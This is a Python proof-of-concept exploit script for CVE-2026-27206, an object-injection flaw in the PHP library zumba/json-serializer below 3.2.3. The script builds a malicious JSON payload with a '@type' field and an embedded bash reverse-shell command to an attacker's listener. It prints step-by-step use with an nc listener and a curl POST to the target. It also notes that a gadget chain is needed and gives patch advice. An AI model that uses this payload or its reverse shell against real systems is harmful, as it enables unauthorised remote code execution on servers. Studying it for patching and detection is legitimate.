#!/usr/bin/env python3
# Exploit Title: zumba/json-serializer zumba/json-serializer < 3.2.3 RCE
# CVE: CVE-2026-27206
# Date: 2026-02-24
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub:
# Vendor Homepage: https://github.com/zumba/json-serializer
# Software Link: https://github.com/zumba/json-serializer
# Affected: zumba/json-serializer < 3.2.3
# Tested on: PHP 8.1 / 8.2
# Category: Remote Code Execution
# Platform: PHP
# Exploit Type: Remote
# CVSS: 8.1 (HIGH)
# CWE: CWE-502 (Deserialization of Untrusted Data)
# Description: Unrestricted PHP object instantiation via @type in JsonSerializer::unserialize() allowing arbitrary class creation and potential code execution via magic methods / gadget chains
# Fixed in: 3.2.3
# Usage: python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>
#
# Examples:
# python3 exploit.py http://example.com/api/unserialize --lhost 192.168.1.100 --lport 4444
#
# Notes:
# • This script generates and shows a malicious payload.
# • Actual exploitation requires:
# 1. An endpoint that accepts JSON and passes it directly to JsonSerializer::unserialize()
# 2. A usable POP gadget chain present in the target application or its dependencies
# • Without a gadget chain this only demonstrates object injection (no RCE).
#
print("""
____ _____ ___ _ _ ___ ___ ___
/ ___| | ____| / _ \ | | | | / _ \ / _ \ / _ \
| | | _| | | | | | |_| | | | | | | | | | | |
| |___ | |___ | |_| | | _ | | |_| | |_| | |_| |
\____| |_____| \___/ |_| |_| \___/ \___/ \___/
CVE-2026-27206 – Proof of Concept
────────────────────────────────────
Author : Mohammed Idrees Banyamer
Country : Jordan
Instagram : @banyamer_security
Date : 2026-02-24
""")
import argparse
import json
import sys
def generate_payload(lhost, lport):
# Example reverse shell command (modify for your target OS / needs)
revshell_cmd = (
f"bash -c \"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1\""
)
# This is a DEMONSTRATION payload.
# In real attacks you need a valid gadget chain (Monolog, Symfony, Laravel, etc.)
payload = {
"@type": "RCEGadget",
"cmd": revshell_cmd
}
return json.dumps(payload, separators=(',', ':'))
def main():
parser = argparse.ArgumentParser(description="CVE-2026-27206 Proof of Concept - Payload Generator")
parser.add_argument("target", help="Target URL that accepts JSON input (for display only)")
parser.add_argument("--lhost", required=True, help="Your IP address for reverse shell")
parser.add_argument("--lport", required=True, help="Port to listen on")
args = parser.parse_args()
print(f"[*] Target URL (info only): {args.target}")
print(f"[*] Listener: {args.lhost}:{args.lport}")
print()
malicious_json = generate_payload(args.lhost, args.lport)
print("[+] Generated malicious JSON payload:")
print("──────────────────────────────────────────────────────────────────────────────")
print(malicious_json)
print("──────────────────────────────────────────────────────────────────────────────")
print()
print("[!] How to use this payload:")
print(" 1. Start a listener: nc -lvnp", args.lport)
print(" 2. POST the JSON above to an endpoint that uses JsonSerializer::unserialize()")
print(" Example (curl):")
print(f" curl -X POST {args.target} \\")
print(" -H 'Content-Type: application/json' \\")
print(" -d '" + malicious_json.replace("'", "'\\''") + "'")
print()
print("[!] Important:")
print(" This payload only works if the application:")
print(" • Uses vulnerable zumba/json-serializer (< 3.2.3)")
print(" • Does NOT call setAllowedClasses()")
print(" • Contains a POP chain that triggers code execution from the crafted object")
print()
print(" Without a gadget chain → only object injection (no RCE)")
print(" Upgrade to >= 3.2.3 and use setAllowedClasses([]) or a whitelist")
if __name__ == "__main__":
if len(sys.argv) == 1:
print("Error: Missing arguments. Use --help for usage.\n")
sys.exit(1)
main()
